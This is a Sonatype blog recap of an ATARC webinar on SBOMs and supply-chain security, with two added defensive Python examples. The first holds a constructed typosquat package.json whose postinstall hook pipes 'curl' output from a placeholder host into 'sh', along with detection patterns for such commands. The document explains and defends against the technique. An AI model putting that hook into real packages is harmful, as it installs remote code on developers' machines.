News and Notes from the Makers of Nexus | Sonatype Blog

Cyber readiness and SBOMs

Written by Aaron Linskens | March 26, 2024

The Advanced Technology Academic Research Center (ATARC) recently hosted the webinar "Unlocking Cyber Readiness with SBOMs," focusing on the essential role of software bills of materials (SBOMs) in enhancing cybersecurity frameworks across various government agencies and private-sector organizations.

The webinar, hosted by ATARC's Kiersten Kotsiuruba, welcomed the following industry experts:

  • Surendra Babu, Acting Chief, Cloud Hosting and Networks Office, Department of Technology Services, Office of the U.S. Courts

  • Brian Fox, Chief Technology Officer (CTO) and co-founder, Sonatype

  • Major Daniel Hawthorne, DevSecOps Lead, ARCYBER Technical Warfare Center, U.S. Army

  • Charles Livingston, Branch Chief, Cybersecurity Risk Management, Office of the Chief Information Officer, U.S. Department of Health and Human Services

  • Elena Peterson, Senior Cybersecurity Researcher, Group Leader, Pacific Northwest National Laboratory, U.S. Department of Energy

The state of modern cybersecurity

Before turning to SBOMs, the discussion opened with the increasingly complex challenge of managing security vulnerabilities and software supply chain risk.

Surendra Babu, Acting Chief of Cloud Hosting and Networks at the U.S. Courts, described the common reactive approach to cybersecurity, pointing to a couple of high-profile security breaches of the past decade.

"Everybody can correlate to the Equifax breach of 2017. We all know about the SolarWinds related activities," said Babu. "In both of these instances, we tried to address the issue in a reactive way by implementing privileged access management solutions across the board."

Brian Fox, CTO and co-founder of Sonatype and caretaker of Maven Central, added context on trends in software supply chain attacks, in which attackers have pivoted to targeting developers and development infrastructure directly rather than waiting for a vulnerability in shipped software.

"We've seen, over the last handful of years, over 300,000 intentionally malicious components published into the open source ecosystem. These are components that are designed to, as soon as the package manager pulls it down, execute the payload," said Fox. "The intentionally malicious part is a whole new ballgame that requires an entirely different approach to solve. And so this is one of the biggest shifts I've observed over the last 15 years."
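The install-time execution Fox describes has a concrete mechanism in the npm ecosystem: a package's `package.json` may declare lifecycle scripts that npm runs automatically when the package is installed, so the payload needs no one to import the module. The following Python is an added example written for this page, not code from the webinar or from Sonatype. It reads a manifest, lists the install-time hooks, and applies a few heuristics to their commands. Both manifests, the package names and the `example.invalid` host are constructed for the example; the heuristic patterns are this example's own choices, not a vetted ruleset.

```python
"""Flag npm packages whose package.json declares install-time lifecycle scripts.

Added example, not code from Sonatype or the webinar. npm runs a dependency's
preinstall, install and postinstall scripts automatically when it is
installed; `prepare` additionally runs for git dependencies. The two
package.json documents below are constructed for illustration (example.invalid
is a reserved, non-routable name).
"""
import json
import re

# Scripts npm executes on `npm install` of the package (no import required).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns that are rare in legitimate build steps but common in
# install-time payloads. Labels are hints for a human reviewer, not verdicts.
SUSPICIOUS_PATTERNS = {
    "network fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest)\b|https?://"),
    "inline code execution": re.compile(r"\bnode\s+-e\b|\beval\s*\("),
    "shell pipe": re.compile(r"\|\s*(sh|bash|cmd|powershell)\b"),
    "encoded payload": re.compile(r"\bbase64\b|\\x[0-9a-fA-F]{2}"),
}

# Constructed benign manifest: only test/build scripts, nothing runs on install.
BENIGN_PACKAGE = json.dumps({
    "name": "left-align",
    "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc -p ."},
})

# Constructed malicious manifest: the payload runs during `npm install`.
MALICIOUS_PACKAGE = json.dumps({
    "name": "left-allign",  # typosquat of the benign name
    "version": "1.0.1",
    "scripts": {
        "test": "node test.js",
        "postinstall": "node -e \"require('child_process').exec('curl -s http://example.invalid/p | sh')\"",
    },
})


def install_hooks(package_json: str) -> dict:
    """Return {hook: command} for every install-time script in the manifest."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts") or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def suspicious_hooks(package_json: str) -> list:
    """Return (hook, command, [reasons]) for install hooks that match a heuristic."""
    findings = []
    for hook, cmd in install_hooks(package_json).items():
        reasons = [label for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(cmd)]
        if reasons:
            findings.append((hook, cmd, reasons))
    return findings


def gate(package_json: str) -> str:
    """Policy decision for a pre-install gate: allow, review, or block."""
    if not install_hooks(package_json):
        return "allow"
    if suspicious_hooks(package_json):
        return "block"
    return "review"  # install hooks are legitimate for some native-addon packages


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_PACKAGE), ("malicious", MALICIOUS_PACKAGE)):
        print(label, gate(doc), suspicious_hooks(doc))
```

A gate like this belongs in front of the package manager (in a proxy repository or a pre-install step), because by the time `npm install` has finished the hook has already run. Installing with `npm ci --ignore-scripts` removes the execution path entirely, at the cost of breaking packages that genuinely need a build step, which is why the "review" outcome exists rather than a blanket block.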

SBOMs, automation, and the future of cybersecurity

As the experts found common ground on the fundamental utility of SBOMs, Fox drew a parallel to software composition analysis (SCA).

"The SCA tool space, one that Sonatype has been in since the beginning, has aimed at providing the exact same outcomes that can be achieved with SBOMs, which is better visibility, better tracking, the understanding and preparedness of the complete organizational bill of materials, all of the dependencies in your organization," said Fox. "Having that on hand is game-changing when something like Log4Shell drops."

Charles Livingston, Branch Chief of Cybersecurity Risk Management at the U.S. Department of Health and Human Services, stressed the importance of automation, especially in the context of security threats in a federal environment.

"With the future challenges, automation is very, very, very important. In an agency like mine that's very federated, we have a challenge that one size doesn't fit all," said Livingston. "We need to strive for automation as best we can, because it then affords us the agility we need to deal with cybersecurity threats."

The discussion also looked toward the future of cybersecurity, again with automation at the center.

"Automation is key in dealing with the dynamic nature of cyber threats and ensuring continuous monitoring of software components," said Major Daniel Hawthorne, DevSecOps Lead with the U.S. Army Cyber Command. "We should be continuously monitoring what software is in production, and what components are alerting on new vulnerabilities that have been discovered in production that may affect us, taking automated actions based on those things."
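Fox's Log4Shell remark and Hawthorne's continuous-monitoring point describe the same query: given the SBOMs of what is deployed, which services carry a component that a newly published advisory puts in its affected range? The following Python is an added example written for this page, not code from Sonatype, from the SBOM Manager product or from the webinar. The three CycloneDX JSON documents, the service names and the advisory record are constructed; the advisory reuses the published affected range for CVE-2021-44228 (log4j-core 2.0-beta9 through 2.14.1, first fixed in 2.15.0), and does not cover the follow-on log4j CVEs. The version ordering is a simplified reading of Maven's rules and is an assumption of this example.

```python
"""Answer "which deployed services carry the vulnerable component?" from SBOMs.

Added example, not Sonatype's code or the SBOM Manager product. The three
CycloneDX 1.5 JSON documents and the service names are constructed. The
advisory record is constructed too, but uses the published affected range for
CVE-2021-44228 (log4j-core 2.0-beta9 up to and including 2.14.1, first fixed
in 2.15.0). Version ordering is a simplified reading of Maven's rules (numeric
segments compared as integers, qualifiers such as "beta" ordering before a
release) and is an assumption of this example.
"""
import json
import re

ADVISORY = {
    "id": "CVE-2021-44228",
    "purl_prefix": "pkg:maven/org.apache.logging.log4j/log4j-core",
    "introduced": "2.0-beta9",  # first affected version (inclusive)
    "fixed": "2.15.0",          # first version outside the affected range
}

# Constructed SBOM inventory: one CycloneDX document per deployed service.
LOG4J = "org.apache.logging.log4j"
SBOMS = {
    "billing-api": json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.5", "components": [
        {"type": "library", "group": LOG4J, "name": "log4j-api", "version": "2.14.1",
         "purl": f"pkg:maven/{LOG4J}/log4j-api@2.14.1?type=jar"},
        {"type": "library", "group": LOG4J, "name": "log4j-core", "version": "2.14.1",
         "purl": f"pkg:maven/{LOG4J}/log4j-core@2.14.1?type=jar"},
    ]}),
    "web-frontend": json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.5", "components": [
        {"type": "library", "group": LOG4J, "name": "log4j-core", "version": "2.17.1",
         "purl": f"pkg:maven/{LOG4J}/log4j-core@2.17.1"},
    ]}),
    "legacy-batch": json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.5", "components": [
        # A shaded jar bundling its own log4j copy, recorded as a nested component.
        {"type": "library", "name": "report-engine", "version": "3.2.0",
         "purl": "pkg:maven/com.example/report-engine@3.2.0", "components": [
             {"type": "library", "group": LOG4J, "name": "log4j-core", "version": "2.0-beta9",
              "purl": f"pkg:maven/{LOG4J}/log4j-core@2.0-beta9"},
         ]},
    ]}),
}


def _version_key(version):
    """Tokenise '2.0-beta9' into [(2,2),(2,0),(0,'beta'),(2,9)]; rank 2 = number, 0 = qualifier."""
    return [(2, int(t)) if t.isdigit() else (0, t.lower())
            for t in re.findall(r"\d+|[A-Za-z]+", version)]


def version_cmp(a, b):
    """Return -1, 0 or 1. A missing trailing segment (rank 1) sits between a
    qualifier and a number, so 2.0-beta9 < 2.0 < 2.0.1."""
    ka, kb = _version_key(a), _version_key(b)
    n = max(len(ka), len(kb))
    ka += [(1,)] * (n - len(ka))
    kb += [(1,)] * (n - len(kb))
    return (ka > kb) - (ka < kb)


def split_purl(purl):
    """Split a package URL into (type/namespace/name, version), dropping qualifiers and subpath."""
    core = re.split(r"[?#]", purl, maxsplit=1)[0]
    base, sep, version = core.rpartition("@")
    return (base, version) if sep else (core, "")


def walk_components(components):
    """Yield every component, including those nested inside other components."""
    for comp in components:
        yield comp
        yield from walk_components(comp.get("components", []))


def is_affected(version, advisory):
    return (version_cmp(version, advisory["introduced"]) >= 0
            and version_cmp(version, advisory["fixed"]) < 0)


def affected_purls(sbom_json, advisory):
    """Return the purls in one SBOM that fall inside the advisory's affected range."""
    bom = json.loads(sbom_json)
    hits = []
    for comp in walk_components(bom.get("components", [])):
        purl = comp.get("purl")
        if not purl:
            continue
        base, version = split_purl(purl)
        if base == advisory["purl_prefix"] and is_affected(version, advisory):
            hits.append(purl)
    return hits


def affected_services(sboms, advisory):
    """Map service -> affected purls, omitting clean services. Re-running this on
    every new advisory is the continuous-monitoring query in practice."""
    return {svc: hits for svc, doc in sboms.items() if (hits := affected_purls(doc, advisory))}


if __name__ == "__main__":
    for service, purls in affected_services(SBOMS, ADVISORY).items():
        print(f"{ADVISORY['id']}: {service} -> {purls}")
```

Two details matter more than they look. Matching on the purl rather than the display name avoids false hits on `log4j-api`, which shares the group and version but was not the vulnerable artifact, and walking nested components catches shaded or vendored copies that a flat listing would miss. The automated action Hawthorne mentions (open a ticket, fail the deploy gate, page the owner) hangs off the returned map; the example stops at producing it.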

The critical path forward

The panel's consensus was that SBOMs are a critical element of current cybersecurity practice.

On proactive cybersecurity measures, Elena Peterson, Senior Cybersecurity Researcher and Group Leader at the Pacific Northwest National Laboratory, made the case for secure-by-design.

"The idea of secure-by-design is really taking hold, and that's a good thing for us in cybersecurity. That will make our lives a little bit easier. It'll allow us to work on the next challenge," said Peterson. "In moving forward with executing secure by design, using SBOMs appropriately is a really good path forward for those of us who do cybersecurity."

Fox underscored the critical role of government regulations in expediting SBOM adoption. He emphasized the importance of proactive defense mechanisms, stating, "You need to defend your developers from those intentionally malicious components. Because once they touch them, it's too late — the data may have been actually traded, the backdoors may have been dropped."

He introduced Sonatype SBOM Manager, a tool designed to support SBOM creation and management. The solution aims to provide clear visibility into software dependencies and their vulnerabilities, strengthening software supply chain security and supporting compliance obligations.

Check out a full recording of the webinar to learn more about SBOMs in the context of cybersecurity and DevSecOps.